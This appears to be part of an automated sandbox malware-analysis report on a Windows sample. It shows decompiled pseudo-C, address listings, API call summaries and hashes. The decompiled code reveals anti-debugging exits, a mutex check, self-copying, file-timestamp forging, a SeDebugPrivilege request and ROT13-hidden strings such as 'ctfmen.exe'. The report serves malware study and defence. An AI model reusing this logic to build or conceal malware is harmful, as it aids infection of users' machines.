                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$lstrlen$CreateSizeWrite$CloseHandlePointerRead
                                                                          • String ID: $.
                                                                          • API String ID: 2059494333-3929174939
                                                                          • Opcode ID: db96ad772c5433479edb6ec15f6712a25d66f452af447f7d950adf714c5fff61
                                                                          • Instruction ID: 330a0651d7a757380811ed2d4a39bd4f834bab233f08717d63250c6a01a72e4e
                                                                          • Opcode Fuzzy Hash: db96ad772c5433479edb6ec15f6712a25d66f452af447f7d950adf714c5fff61
                                                                          • Instruction Fuzzy Hash: 17B1DDB4804304DBDB10EF65C59579EBBF4BF44304F00896EE898A7391E7799648CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 22%
                                                                          			E00404076(void* __edx) {
                                                                          				void* _v16;
                                                                          				char _v428;
                                                                          				char _v588;
                                                                          				char _v748;
                                                                          				char _v908;
                                                                          				char _v940;
                                                                          				char _v944;
                                                                          				char* _v976;
                                                                          				int _v980;
                                                                          				int _v984;
                                                                          				char* _v988;
                                                                          				int _v992;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* _t43;
                                                                          				void* _t44;
                                                                          				void* _t51;
                                                                          				void* _t52;
                                                                          				void* _t53;
                                                                          				void* _t55;
                                                                          				char _t58;
                                                                          				void* _t60;
                                                                          				intOrPtr _t63;
                                                                          				char* _t90;
                                                                          				char* _t91;
                                                                          				char* _t92;
                                                                          				char* _t93;
                                                                          				void* _t96;
                                                                          				void* _t98;
                                                                          				char* _t100;
                                                                          				void* _t101;
                                                                          				char* _t102;
                                                                          				void* _t103;
                                                                          				int* _t106;
                                                                          				char** _t107;
                                                                          				char** _t109;
                                                                          				char** _t112;
                                                                          				char** _t113;
                                                                          
                                                                          				_t96 = __edx;
                                                                          				E0040B320();
                                                                          				E0040AEB0();
                                                                          				_v984 =  &_v428;
                                                                          				_v988 = 2; // executed
                                                                          				L004086C8(); // executed
                                                                          				_t106 = (_t103 - 0x000003cc & 0xfffffff0) - 8;
                                                                          				_t43 = E00404AB8();
                                                                          				_t114 = _t43;
                                                                          				if(_t43 != 0) {
                                                                          					 *_t106 = 0;
                                                                          					ExitProcess(??); // executed
                                                                          				}
                                                                          				_t44 = E004049EA(_t114); // executed
                                                                          				if(_t44 != 0) {
                                                                          					 *_t106 = 0;
                                                                          					ExitProcess(??);
                                                                          				}
                                                                          				_t98 =  &_v940;
                                                                          				asm("cld");
                                                                          				memset(_t98, 0, 7 << 2);
                                                                          				_t107 =  &(_t106[3]);
                                                                          				 *((short*)(_t98 + 7)) = 0;
                                                                          				_v988 = "user32.dll";
                                                                          				_v992 = 0x96;
                                                                          				 *_t107 =  &_v908;
                                                                          				E00404620();
                                                                          				_v992 = "fureinaf.qyy";
                                                                          				_t100 =  &_v940;
                                                                          				 *_t107 = _t100;
                                                                          				E00404C38();
                                                                          				_v988 = _t100;
                                                                          				_v992 = 0x96;
                                                                          				_t90 =  &_v588;
                                                                          				 *_t107 = _t90;
                                                                          				E00404620();
                                                                          				 *_t107 = _t90; // executed
                                                                          				_t51 = E00403F24(); // executed
                                                                          				_t101 = _t51; // executed
                                                                          				_t52 = E00403D26(_t90); // executed
                                                                          				if(_t52 != 0) {
                                                                          					_t53 = E00403E2E(_t90); // executed
                                                                          					_t97 = 0;
                                                                          					__eflags = _t53;
                                                                          					if(_t53 == 0) {
                                                                          						_t91 =  &_v588;
                                                                          						 *_t107 = _t91; // executed
                                                                          						_t55 = E00404ED6(); // executed
                                                                          						__eflags = _t55;
                                                                          						if(_t55 != 0) {
                                                                          							__eflags = _t101;
                                                                          							if(_t101 == 0) {
                                                                          								 *_t107 =  &_v588;
                                                                          								LoadLibraryA(??);
                                                                          								_t107 = _t107 - 4;
                                                                          							}
                                                                          							_v992 = "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba";
                                                                          							_t102 =  &_v748;
                                                                          							 *_t107 = _t102;
                                                                          							E00404C38();
                                                                          							_v992 = "fgngrz";
                                                                          							_t92 =  &_v940;
                                                                          							 *_t107 = _t92;
                                                                          							E00404C38();
                                                                          							_v992 = _t92;
                                                                          							 *_t107 = _t102; // executed
                                                                          							_t58 = E00404812(_t92); // executed
                                                                          							_v944 = _t58;
                                                                          							__eflags = _t58 - 1;
                                                                          							if(_t58 <= 1) {
                                                                          								_v976 =  &_v944;
                                                                          								_v980 = 0;
                                                                          								_v984 = 0;
                                                                          								_v988 = E00403AE0;
                                                                          								_v992 = 0;
                                                                          								 *_t107 = 0; // executed
                                                                          								CreateThread(??, ??, ??, ??, ??, ??); // executed
                                                                          								_t107 = _t107 - 0x18;
                                                                          							}
                                                                          							 *_t107 = "SeDebugPrivilege"; // executed
                                                                          							E00404DF4(); // executed
                                                                          							 *_t107 = 0x7d0; // executed
                                                                          							Sleep(??); // executed
                                                                          							_t109 = _t107 - 4; // executed
                                                                          							_t60 = E0040402C(_t92); // executed
                                                                          							__eflags = _t60;
                                                                          							if(_t60 == 0) {
                                                                          								 *_t109 =  &_v588;
                                                                          								LoadLibraryA(??);
                                                                          								_t109 = _t109 - 4;
                                                                          							}
                                                                          							_v992 = "hfonpgvi";
                                                                          							_t93 =  &_v940;
                                                                          							 *_t109 = _t93;
                                                                          							E00404C38();
                                                                          							_v992 = _t93;
                                                                          							 *_t109 =  &_v748; // executed
                                                                          							_t63 = E00404812(_t93); // executed
                                                                          							_v944 = _t63;
                                                                          							__eflags = _t63 - 1;
                                                                          							if(_t63 == 1) {
                                                                          								E00406A0A(); // executed
                                                                          							}
                                                                          							E00407C4E(_t97); // executed
                                                                          							L18:
                                                                          							 *_t109 = 0xfa0;
                                                                          							Sleep(??);
                                                                          							_t109 = _t109 - 4;
                                                                          							goto L18;
                                                                          						}
                                                                          						E00405DC4(0);
                                                                          						 *_t107 = _t91;
                                                                          						E00405D46(_t91, 0);
                                                                          						E00403C44(_t91, _t100, _t101);
                                                                          						E004056D0(0);
                                                                          						 *_t107 = _t91;
                                                                          						E004054F2(0);
                                                                          						_v992 = _t91;
                                                                          						 *_t107 =  &_v908;
                                                                          						E0040435C(_t91, _t97);
                                                                          						 *_t107 = _t91;
                                                                          						LoadLibraryA(??);
                                                                          						 *(_t107 - 4) = 0xfa0;
                                                                          						Sleep(??);
                                                                          						_t97 = 0;
                                                                          					}
                                                                          				} else {
                                                                          					E00405DC4(_t96);
                                                                          					 *_t107 = _t90;
                                                                          					E00405D46(_t90, _t96);
                                                                          					E00403C44(_t90, _t100, _t101);
                                                                          					E004056D0(_t96);
                                                                          					 *_t107 = _t90;
                                                                          					E004054F2(_t96);
                                                                          					_v992 = _t90;
                                                                          					 *_t107 =  &_v908;
                                                                          					E0040435C(_t90, _t96);
                                                                          					 *_t107 = _t90;
                                                                          					LoadLibraryA(??);
                                                                          					_t112 = _t107 - 4;
                                                                          					 *_t112 = 0xfa0;
                                                                          					Sleep(??);
                                                                          					_t113 = _t112 - 4;
                                                                          					_v992 = "pgszra.rkr";
                                                                          					 *_t113 = _t100;
                                                                          					E00404C38();
                                                                          					_v992 = 0;
                                                                          					 *_t113 = _t100;
                                                                          					E00405776(_t90);
                                                                          					_t97 = 0;
                                                                          				}
                                                                          				return _t97;
                                                                          			}










































                                                                          0x00404076
                                                                          0x0040408a
                                                                          0x0040408f
                                                                          0x0040409a
                                                                          0x0040409e
                                                                          0x004040a5
                                                                          0x004040aa
                                                                          0x004040ad
                                                                          0x004040b2
                                                                          0x004040b4
                                                                          0x004040b6
                                                                          0x004040bd
                                                                          0x004040bd
                                                                          0x004040c2
                                                                          0x004040c9
                                                                          0x004040cb
                                                                          0x004040d2
                                                                          0x004040d2
                                                                          0x004040d7
                                                                          0x004040dd
                                                                          0x004040e8
                                                                          0x004040e8
                                                                          0x004040ea
                                                                          0x004040ef
                                                                          0x004040f7
                                                                          0x00404105
                                                                          0x00404108
                                                                          0x0040410d
                                                                          0x00404115
                                                                          0x0040411b
                                                                          0x0040411e
                                                                          0x00404123
                                                                          0x00404127
                                                                          0x0040412f
                                                                          0x00404135
                                                                          0x00404138
                                                                          0x0040413d
                                                                          0x00404140
                                                                          0x00404145
                                                                          0x00404147
                                                                          0x0040414e
                                                                          0x004041c5
                                                                          0x004041ca
                                                                          0x004041cf
                                                                          0x004041d1
                                                                          0x004041d7
                                                                          0x004041dd
                                                                          0x004041e0
                                                                          0x004041e5
                                                                          0x004041e7
                                                                          0x0040423e
                                                                          0x00404240
                                                                          0x00404248
                                                                          0x0040424b
                                                                          0x00404250
                                                                          0x00404250
                                                                          0x00404253
                                                                          0x0040425b
                                                                          0x00404261
                                                                          0x00404264
                                                                          0x00404269
                                                                          0x00404271
                                                                          0x00404277
                                                                          0x0040427a
                                                                          0x0040427f
                                                                          0x00404283
                                                                          0x00404286
                                                                          0x0040428b
                                                                          0x00404291
                                                                          0x00404294
                                                                          0x0040429c
                                                                          0x004042a0
                                                                          0x004042a8
                                                                          0x004042b0
                                                                          0x004042b8
                                                                          0x004042c0
                                                                          0x004042c7
                                                                          0x004042cc
                                                                          0x004042cc
                                                                          0x004042cf
                                                                          0x004042d6
                                                                          0x004042db
                                                                          0x004042e2
                                                                          0x004042e7
                                                                          0x004042ea
                                                                          0x004042ef
                                                                          0x004042f1
                                                                          0x004042f9
                                                                          0x004042fc
                                                                          0x00404301
                                                                          0x00404301
                                                                          0x00404304
                                                                          0x0040430c
                                                                          0x00404312
                                                                          0x00404315
                                                                          0x0040431a
                                                                          0x00404324
                                                                          0x00404327
                                                                          0x0040432c
                                                                          0x00404332
                                                                          0x00404335
                                                                          0x00404337
                                                                          0x00404337
                                                                          0x0040433c
                                                                          0x00404341
                                                                          0x00404341
                                                                          0x00404348
                                                                          0x0040434d
                                                                          0x00000000
                                                                          0x0040434d
                                                                          0x004041e9
                                                                          0x004041ee
                                                                          0x004041f1
                                                                          0x004041f6
                                                                          0x004041fb
                                                                          0x00404200
                                                                          0x00404203
                                                                          0x00404208
                                                                          0x00404212
                                                                          0x00404215
                                                                          0x0040421a
                                                                          0x0040421d
                                                                          0x00404225
                                                                          0x0040422c
                                                                          0x00404234
                                                                          0x00404234
                                                                          0x00404150
                                                                          0x00404150
                                                                          0x00404155
                                                                          0x00404158
                                                                          0x0040415d
                                                                          0x00404162
                                                                          0x00404167
                                                                          0x0040416a
                                                                          0x0040416f
                                                                          0x00404179
                                                                          0x0040417c
                                                                          0x00404181
                                                                          0x00404184
                                                                          0x00404189
                                                                          0x0040418c
                                                                          0x00404193
                                                                          0x00404198
                                                                          0x0040419b
                                                                          0x004041a3
                                                                          0x004041a6
                                                                          0x004041ab
                                                                          0x004041b3
                                                                          0x004041b6
                                                                          0x004041bb
                                                                          0x004041bb
                                                                          0x0040435b

                                                                          APIs
                                                                          • WSAStartup.WS2_32 ref: 004040A5
                                                                            • Part of subcall function 00404AB8: IsDebuggerPresent.KERNEL32(004040B2), ref: 00404AC1
                                                                          • ExitProcess.KERNEL32 ref: 004040BD
                                                                            • Part of subcall function 00403E2E: CreateMutexA.KERNEL32 ref: 00403E5B
                                                                            • Part of subcall function 00403E2E: GetLastError.KERNEL32 ref: 00403E63
                                                                            • Part of subcall function 00404ED6: fopen.MSVCRT ref: 00404EEA
                                                                            • Part of subcall function 00404ED6: fclose.MSVCRT ref: 00404EFB
                                                                          • ExitProcess.KERNEL32 ref: 004040D2
                                                                          • LoadLibraryA.KERNEL32 ref: 00404184
                                                                          • Sleep.KERNEL32 ref: 00404193
                                                                          • LoadLibraryA.KERNEL32 ref: 0040421D
                                                                          • Sleep.KERNEL32 ref: 0040422C
                                                                          • LoadLibraryA.KERNEL32 ref: 0040424B
                                                                          • CreateThread.KERNEL32 ref: 004042C7
                                                                          • Sleep.KERNEL32 ref: 004042E2
                                                                          • LoadLibraryA.KERNEL32 ref: 004042FC
                                                                          • Sleep.KERNEL32 ref: 00404348
                                                                            • Part of subcall function 00405DC4: CreateFileA.KERNEL32 ref: 00405E5E
                                                                            • Part of subcall function 00405DC4: ExitProcess.KERNEL32 ref: 00405E7E
                                                                            • Part of subcall function 00405DC4: CloseHandle.KERNEL32 ref: 00405E9E
                                                                            • Part of subcall function 00405D46: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405D83
                                                                            • Part of subcall function 00405D46: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405DB7
                                                                            • Part of subcall function 004056D0: GetModuleFileNameA.KERNEL32 ref: 004056F4
                                                                            • Part of subcall function 004056D0: CopyFileA.KERNEL32 ref: 0040573B
                                                                            • Part of subcall function 004054F2: CreateFileA.KERNEL32 ref: 00405531
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405574
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040559A
                                                                            • Part of subcall function 004054F2: Sleep.KERNEL32 ref: 004055A9
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 004055D4
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004055FA
                                                                            • Part of subcall function 004054F2: Sleep.KERNEL32 ref: 00405609
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405634
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040565A
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 0040567D
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004056AF
                                                                            • Part of subcall function 004054F2: CloseHandle.KERNEL32 ref: 004056C0
                                                                            • Part of subcall function 0040435C: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
                                                                            • Part of subcall function 0040435C: GetFileTime.KERNEL32 ref: 004043CD
                                                                            • Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 004043E5
                                                                            • Part of subcall function 0040435C: CreateFileA.KERNEL32 ref: 00404423
                                                                            • Part of subcall function 0040435C: SetFileTime.KERNEL32 ref: 00404453
                                                                            • Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 00404467
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$Create$Sleep$CloseHandle$LibraryLoadPointerWrite$ExitProcess$Time$CopyDebuggerErrorLastModuleMutexNamePresentStartupThreadfclosefopen
                                                                          • String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba$SeDebugPrivilege$fgngrz$fureinaf.qyy$hfonpgvi$pgszra.rkr$user32.dll
                                                                          • API String ID: 2057360409-330933156
                                                                          • Opcode ID: 8bcb1cdb326dd3b7c058104fb4f3aa8cc7f9810afd15cdc21136cb6300fb904a
                                                                          • Instruction ID: 0cfcdf05f74210d9808c357536bce9e529f0bcd84bc5eb1993387659449c0d65
                                                                          • Opcode Fuzzy Hash: 8bcb1cdb326dd3b7c058104fb4f3aa8cc7f9810afd15cdc21136cb6300fb904a
                                                                          • Instruction Fuzzy Hash: 67610EB09087048AD710BF75C58625EBAE4AF81308F41997FE9C4776C2DB7C96888F5B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 142 40b0e0-40b0f4 143 40b0f6-40b0fd 142->143 144 40b0fe-40b19b FindAtomA 142->144 145 40b1a1-40b1b1 malloc 144->145 146 40b2dc-40b2e1 call 40b040 144->146 148 40b310-40b315 abort 145->148 149 40b1b7-40b22e 145->149 153 40b2e3-40b300 146->153 150 40b230-40b247 149->150 150->150 152 40b249-40b2bd AddAtomA 150->152 154 40b301-40b30c call 40b040 152->154 155 40b2bf 152->155 154->155 160 40b30e 154->160 156 40b2c1-40b2c3 155->156 156->153 158 40b2c5-40b2d9 ??3@YAXPAX@Z FindAtomA 156->158 158->146 160->156
                                                                          C-Code - Quality: 51%
                                                                          			E0040B0E0(void* __eax) {
                                                                          				void* _v16;
                                                                          				short _v44;
                                                                          				intOrPtr _v48;
                                                                          				intOrPtr _v52;
                                                                          				intOrPtr _v56;
                                                                          				intOrPtr _v60;
                                                                          				intOrPtr _v64;
                                                                          				intOrPtr _v68;
                                                                          				intOrPtr _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				intOrPtr _v84;
                                                                          				intOrPtr _v88;
                                                                          				intOrPtr _v92;
                                                                          				intOrPtr _v96;
                                                                          				intOrPtr _v100;
                                                                          				intOrPtr _v104;
                                                                          				char _v108;
                                                                          				short _v124;
                                                                          				intOrPtr _v128;
                                                                          				intOrPtr _v132;
                                                                          				intOrPtr _v136;
                                                                          				intOrPtr _v140;
                                                                          				intOrPtr _v144;
                                                                          				intOrPtr _v148;
                                                                          				intOrPtr _v152;
                                                                          				intOrPtr _v156;
                                                                          				char _v188;
                                                                          				int _v192;
                                                                          				void* __ebx;
                                                                          				char _t51;
                                                                          				intOrPtr _t52;
                                                                          				intOrPtr _t53;
                                                                          				intOrPtr _t54;
                                                                          				intOrPtr _t55;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t57;
                                                                          				intOrPtr _t58;
                                                                          				signed int _t61;
                                                                          				intOrPtr _t64;
                                                                          				void* _t65;
                                                                          				intOrPtr _t71;
                                                                          				intOrPtr _t73;
                                                                          				signed char _t75;
                                                                          				char _t78;
                                                                          				intOrPtr _t79;
                                                                          				intOrPtr _t80;
                                                                          				intOrPtr _t81;
                                                                          				intOrPtr _t82;
                                                                          				intOrPtr _t83;
                                                                          				intOrPtr _t84;
                                                                          				intOrPtr _t85;
                                                                          				signed short _t88;
                                                                          				void* _t90;
                                                                          				void* _t92;
                                                                          				signed int _t93;
                                                                          				signed int _t94;
                                                                          				void* _t96;
                                                                          				signed int _t101;
                                                                          				intOrPtr _t103;
                                                                          				intOrPtr _t104;
                                                                          				void* _t105;
                                                                          				signed int _t106;
                                                                          				signed int _t109;
                                                                          				signed int _t110;
                                                                          				signed int* _t111;
                                                                          				intOrPtr* _t112;
                                                                          				intOrPtr* _t114;
                                                                          				signed int* _t115;
                                                                          
                                                                          				_t94 =  *0x418284;
                                                                          				if(_t94 == 0) {
                                                                          					_v108 = 0x41414141;
                                                                          					_t51 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
                                                                          					_t110 =  &_v108;
                                                                          					_v104 = 0x41414141;
                                                                          					_v100 = 0x41414141;
                                                                          					_v76 = _t51;
                                                                          					_t52 = M004131B4; // 0x57434347
                                                                          					_v96 = 0x41414141;
                                                                          					_v92 = 0x41414141;
                                                                          					_v72 = _t52;
                                                                          					_t53 = M004131B8; // 0x452d3233
                                                                          					_v88 = 0x41414141;
                                                                          					_v84 = 0x41414141;
                                                                          					_v68 = _t53;
                                                                          					_t54 = M004131BC; // 0x2d322d48
                                                                          					_v80 = 0x41414141;
                                                                          					_v64 = _t54;
                                                                          					_t55 = M004131C0; // 0x4a4c4a53
                                                                          					_v60 = _t55;
                                                                          					_t56 = M004131C4; // 0x4854472d
                                                                          					_v56 = _t56;
                                                                          					_t57 = M004131C8; // 0x494d2d52
                                                                          					_v52 = _t57;
                                                                          					_t58 =  *0x4131cc; // 0x3357474e
                                                                          					_v48 = _t58;
                                                                          					_v44 =  *0x4131d0 & 0x0000ffff;
                                                                          					 *_t111 = _t110;
                                                                          					_t61 = FindAtomA(??) & 0x0000ffff;
                                                                          					_t112 = _t111 - 4;
                                                                          					_v192 = _t61;
                                                                          					if(_t61 != 0) {
                                                                          						L10:
                                                                          						_t93 = E0040B040(_t61, _t92);
                                                                          					} else {
                                                                          						 *_t112 = 0x3c;
                                                                          						_t65 = malloc(??);
                                                                          						_t93 = _t65;
                                                                          						if(_t65 == 0) {
                                                                          							abort();
                                                                          							0;
                                                                          							0;
                                                                          							_push(_t94);
                                                                          							_t96 = _t112 + 8;
                                                                          							while(_t65 >= 0x1000) {
                                                                          								_t96 = _t96 - 0x1000;
                                                                          								_t65 = _t65 - 0x1000;
                                                                          							}
                                                                          							goto __eax;
                                                                          						}
                                                                          						asm("cld");
                                                                          						memset(_t65, _v192, 0xf << 2);
                                                                          						_t114 = _t112 + 0xc;
                                                                          						 *((intOrPtr*)(_t93 + 4)) = L0040C278;
                                                                          						_t101 = 1;
                                                                          						 *((intOrPtr*)(_t93 + 8)) = E0040B030;
                                                                          						 *_t93 = 0x3c;
                                                                          						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                          						 *((intOrPtr*)(_t93 + 0x14)) =  *0x418254;
                                                                          						_t71 =  *0x40d4f0; // 0x0
                                                                          						 *((intOrPtr*)(_t93 + 0x18)) =  *0x418258;
                                                                          						_t103 =  *0x40d4f4; // 0xffffffff
                                                                          						 *((intOrPtr*)(_t93 + 0x1c)) = _t71;
                                                                          						 *((intOrPtr*)(_t93 + 0x20)) = _t103;
                                                                          						 *((intOrPtr*)(_t93 + 0x30)) = 0xffffffff;
                                                                          						 *((intOrPtr*)(_t93 + 0x2c)) =  *0x418264;
                                                                          						_t104 =  *0x40d4fc; // 0xffffffff
                                                                          						_t73 =  *0x40d4f8; // 0x0
                                                                          						 *((intOrPtr*)(_t93 + 0x38)) = _t104;
                                                                          						_t105 = 0x1f;
                                                                          						 *((intOrPtr*)(_t93 + 0x34)) = _t73;
                                                                          						do {
                                                                          							_t75 = _t93 & _t101;
                                                                          							asm("sbb eax, eax");
                                                                          							_t101 = _t101 + _t101;
                                                                          							 *((char*)(_t105 +  &_v188)) = (_t75 & 0x00000020) + 0x41;
                                                                          							_t105 = _t105 - 1;
                                                                          						} while (_t105 >= 0);
                                                                          						_t78 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
                                                                          						_v156 = _t78;
                                                                          						_t79 = M004131B4; // 0x57434347
                                                                          						_v152 = _t79;
                                                                          						_t80 = M004131B8; // 0x452d3233
                                                                          						_v148 = _t80;
                                                                          						_t81 = M004131BC; // 0x2d322d48
                                                                          						_v144 = _t81;
                                                                          						_t82 = M004131C0; // 0x4a4c4a53
                                                                          						_v140 = _t82;
                                                                          						_t83 = M004131C4; // 0x4854472d
                                                                          						_v136 = _t83;
                                                                          						_t84 = M004131C8; // 0x494d2d52
                                                                          						_v132 = _t84;
                                                                          						_t85 =  *0x4131cc; // 0x3357474e
                                                                          						_v128 = _t85;
                                                                          						_v124 =  *0x4131d0 & 0x0000ffff;
                                                                          						 *_t114 =  &_v188; // executed
                                                                          						_t88 = AddAtomA(??); // executed
                                                                          						_t109 = _t88 & 0x0000ffff;
                                                                          						_t115 = _t114 - 4;
                                                                          						if(_t109 != 0) {
                                                                          							_t90 = E0040B040(_t109, _t93);
                                                                          							_t106 = _t109;
                                                                          							if(_t90 != _t93) {
                                                                          								goto L7;
                                                                          							} else {
                                                                          								goto L8;
                                                                          							}
                                                                          							goto L19;
                                                                          						} else {
                                                                          							L7:
                                                                          							_t106 = 0;
                                                                          						}
                                                                          						L8:
                                                                          						if(_t106 == 0) {
                                                                          							 *_t115 = _t93;
                                                                          							L0040C1C8();
                                                                          							 *_t115 = _t110;
                                                                          							_t61 = FindAtomA(??) & 0x0000ffff;
                                                                          							goto L10;
                                                                          						}
                                                                          					}
                                                                          					 *0x418284 = _t93;
                                                                          					_t46 = _t93 + 4; // 0x4
                                                                          					 *0x418274 = _t46;
                                                                          					_t47 = _t93 + 8; // 0x8
                                                                          					_t64 = _t47;
                                                                          					 *0x418294 = _t64;
                                                                          					return _t64;
                                                                          				} else {
                                                                          					return __eax;
                                                                          				}
                                                                          				L19:
                                                                          			}








































































                                                                          0x0040b0ec
                                                                          0x0040b0f4
                                                                          0x0040b0fe
                                                                          0x0040b105
                                                                          0x0040b10a
                                                                          0x0040b10d
                                                                          0x0040b114
                                                                          0x0040b11b
                                                                          0x0040b11e
                                                                          0x0040b123
                                                                          0x0040b12a
                                                                          0x0040b131
                                                                          0x0040b134
                                                                          0x0040b139
                                                                          0x0040b140
                                                                          0x0040b147
                                                                          0x0040b14a
                                                                          0x0040b14f
                                                                          0x0040b156
                                                                          0x0040b159
                                                                          0x0040b15e
                                                                          0x0040b161
                                                                          0x0040b166
                                                                          0x0040b169
                                                                          0x0040b16e
                                                                          0x0040b171
                                                                          0x0040b176
                                                                          0x0040b180
                                                                          0x0040b184
                                                                          0x0040b18d
                                                                          0x0040b190
                                                                          0x0040b195
                                                                          0x0040b19b
                                                                          0x0040b2dc
                                                                          0x0040b2e1
                                                                          0x0040b1a1
                                                                          0x0040b1a1
                                                                          0x0040b1a8
                                                                          0x0040b1af
                                                                          0x0040b1b1
                                                                          0x0040b310
                                                                          0x0040b31b
                                                                          0x0040b31f
                                                                          0x0040b320
                                                                          0x0040b323
                                                                          0x0040b326
                                                                          0x0040b32d
                                                                          0x0040b336
                                                                          0x0040b336
                                                                          0x0040b34b
                                                                          0x0040b34b
                                                                          0x0040b1b7
                                                                          0x0040b1c5
                                                                          0x0040b1c5
                                                                          0x0040b1c7
                                                                          0x0040b1ce
                                                                          0x0040b1d3
                                                                          0x0040b1df
                                                                          0x0040b1eb
                                                                          0x0040b1f2
                                                                          0x0040b1f5
                                                                          0x0040b1fa
                                                                          0x0040b1fd
                                                                          0x0040b203
                                                                          0x0040b20b
                                                                          0x0040b20e
                                                                          0x0040b215
                                                                          0x0040b218
                                                                          0x0040b21e
                                                                          0x0040b223
                                                                          0x0040b226
                                                                          0x0040b22b
                                                                          0x0040b230
                                                                          0x0040b232
                                                                          0x0040b237
                                                                          0x0040b23b
                                                                          0x0040b23f
                                                                          0x0040b246
                                                                          0x0040b246
                                                                          0x0040b249
                                                                          0x0040b24e
                                                                          0x0040b254
                                                                          0x0040b259
                                                                          0x0040b25f
                                                                          0x0040b264
                                                                          0x0040b26a
                                                                          0x0040b26f
                                                                          0x0040b275
                                                                          0x0040b27a
                                                                          0x0040b280
                                                                          0x0040b285
                                                                          0x0040b28b
                                                                          0x0040b290
                                                                          0x0040b293
                                                                          0x0040b298
                                                                          0x0040b2a2
                                                                          0x0040b2ac
                                                                          0x0040b2af
                                                                          0x0040b2b5
                                                                          0x0040b2b8
                                                                          0x0040b2bd
                                                                          0x0040b303
                                                                          0x0040b30a
                                                                          0x0040b30c
                                                                          0x00000000
                                                                          0x0040b30e
                                                                          0x00000000
                                                                          0x0040b30e
                                                                          0x00000000
                                                                          0x0040b2bf
                                                                          0x0040b2bf
                                                                          0x0040b2bf
                                                                          0x0040b2bf
                                                                          0x0040b2c1
                                                                          0x0040b2c3
                                                                          0x0040b2c5
                                                                          0x0040b2c8
                                                                          0x0040b2cd
                                                                          0x0040b2d9
                                                                          0x00000000
                                                                          0x0040b2d9
                                                                          0x0040b2c3
                                                                          0x0040b2e3
